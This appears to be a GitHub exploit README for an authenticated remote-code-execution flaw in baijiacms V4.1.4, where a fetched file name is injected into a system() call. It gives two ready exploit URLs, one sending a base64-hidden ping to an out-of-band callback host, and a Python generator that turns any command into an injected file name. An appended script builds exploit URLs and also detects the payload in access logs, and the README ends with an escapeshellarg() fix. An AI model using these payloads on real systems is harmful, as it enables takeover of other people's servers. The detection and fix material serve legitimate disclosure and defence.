This-is-Y/baijiacms-RCE
baijiacms-RCE

Authenticated admin-panel RCE in baijiacms

Project: https://github.com/baijiacms/baijiacmsV4

Version: V4.1.4 20170105 FINAL

Test environment:

  • php 5.5.38
  • nginx 1.15
  • mysql 5.7.27
  • Ubuntu 20.04.1


The vulnerable code is at line 654 of includes/baijiacms/common.inc.php, where a user-influenced file name reaches a system() call.

Exploitation

This system() call exists to run image compression. To reach it you must first log in to the admin panel and set an image compression ratio in the settings; otherwise execution never gets to this code. The file name taken from the url parameter of the fetch request is then placed into the shell command, so a name of the form name.;<injected command>; terminates the compression command and runs the attacker's one. Spaces are written as ${IFS}, which the shell expands to whitespace, so the URL needs no literal spaces.

EXP1 (the base64 decodes to ping poc.exr6mq.ceye.io -c 4, an out-of-band DNS callback): http://192.168.0.64/baijiacmsV4-4.1.4/index.php?mod=site&act=public&do=file&op=fetch&url=http://127.0.0.1/poc.;echo${IFS}cGluZyBwb2MuZXhyNm1xLmNleWUuaW8gLWMgNA==|base64${IFS}-d|bash;&status=1&beid=1

EXP2 (the base64 decodes to whoami): http://192.168.0.64/baijiacmsV4-4.1.4/index.php?mod=site&act=public&do=file&op=fetch&url=http://127.0.0.1/whoami.;echo${IFS}d2hvYW1p|base64${IFS}-d|bash;&status=1&beid=1

The poc file referenced in the url parameter can be generated with the script below. Afterwards start a web server on the directory it writes to, so that the CMS can fetch a file with that exact name and execution continues into the compression step.

import base64

# Directory served by the helper web server; the generated file must be
# reachable at http://127.0.0.1/<name>.;echo${IFS}...;
webpath = "/home/ubuntu/test/"
cmd = input("cmd>>> ")

# Base64-encode the command so it carries no spaces or quotes of its own.
b64cmd = base64.b64encode(cmd.encode()).decode()

payload = f"echo {b64cmd}|base64 -d|bash"
print(payload)
# ${IFS} expands to whitespace in the shell, so the URL needs no literal spaces.
payload = payload.replace(' ', '${IFS}')
print(payload)

name = input("name>>>")
# The first ";" terminates the image-compression command inside system();
# the trailing ";" closes the injected one.
payload = f"{name}.;{payload};"
print(payload)

# Create a file with that exact name so the CMS fetch of the URL succeeds.
with open(file=webpath + payload, mode='w') as f:
    f.write('1')
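The following is an added example, not code from this repository, that complements the generator above: it builds the same injected file name and fetch URL programmatically, and, for the defensive side, recovers the hidden command from a request URL or an nginx-style access-log line (raw or percent-encoded, as a server would log it). The CMS base URL, client IPs and log lines are assumed or constructed, not real traffic; the URL layout follows the EXP lines above.

```python
import base64
import re
from urllib.parse import unquote

# Matches the README's chain: echo${IFS}<b64>|base64${IFS}-d|bash (spaces or ${IFS}).
INJECT_RE = re.compile(
    r"echo(?:\$\{IFS\}|\s)+([A-Za-z0-9+/=]+)\|base64(?:\$\{IFS\}|\s)+-d\|(?:ba)?sh"
)
# Request target out of a combined-format access log line.
REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')


def build_payload(cmd: str, name: str = "poc") -> str:
    """File name that, once it reaches system(), runs cmd after the image job.

    cmd is base64-encoded so it needs no quotes or spaces; the remaining spaces
    become ${IFS}, which the shell expands and word-splits ('echo${IFS}X' -> 'echo X').
    """
    b64 = base64.b64encode(cmd.encode()).decode()
    chain = f"echo {b64}|base64 -d|bash".replace(" ", "${IFS}")
    return f"{name}.;{chain};"


def build_exploit_url(base: str, cmd: str, host: str = "127.0.0.1") -> str:
    """Fetch URL in the shape of the README's EXP lines (base = CMS root, assumed)."""
    return (f"{base}/index.php?mod=site&act=public&do=file&op=fetch"
            f"&url=http://{host}/{build_payload(cmd)}&status=1&beid=1")


def decode_injected(text: str):
    """Return the command hidden in a fetch URL, or None if there is none.

    Works on raw and percent-encoded input (nginx logs '${IFS}' as '%24%7BIFS%7D').
    """
    m = INJECT_RE.search(unquote(text))
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode(errors="replace")
    except ValueError:  # malformed base64: not this payload shape
        return None


def scan_access_log(lines):
    """Return (client_ip, decoded_command) for every fetch request carrying the injection."""
    hits = []
    for line in lines:
        m = REQUEST_RE.search(line)
        if not m or "op=fetch" not in m.group(1):
            continue
        cmd = decode_injected(m.group(1))
        if cmd is not None:
            hits.append((line.split(" ", 1)[0], cmd))
    return hits


# Constructed sample access-log lines (assumed hosts and IPs, not real traffic):
# a benign image fetch, then the README's EXP2 as nginx would percent-encode it.
SAMPLE_LOG = [
    '192.168.0.10 - - [05/Jan/2017:10:00:01 +0000] "GET /baijiacmsV4-4.1.4/index.php'
    '?mod=site&act=public&do=file&op=fetch&url=http://127.0.0.1/logo.png&status=1&beid=1'
    ' HTTP/1.1" 200 512',
    '192.168.0.77 - - [05/Jan/2017:10:00:02 +0000] "GET /baijiacmsV4-4.1.4/index.php'
    '?mod=site&act=public&do=file&op=fetch&url=http://127.0.0.1/whoami.;echo%24%7BIFS%7D'
    'd2hvYW1p%7Cbase64%24%7BIFS%7D-d%7Cbash;&status=1&beid=1 HTTP/1.1" 200 512',
]

if __name__ == "__main__":
    print(build_exploit_url("http://192.168.0.64/baijiacmsV4-4.1.4", "id"))
    for ip, cmd in scan_access_log(SAMPLE_LOG):
        print(f"{ip} injected: {cmd}")
```

For detection, the combination of op=fetch with ${IFS} (or its encoded form %24%7BIFS%7D) in the url parameter is a high-signal indicator, since a legitimate image URL never contains it. The root-cause fix on the PHP side is to pass the file name through escapeshellarg() before it is concatenated into the system() command.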
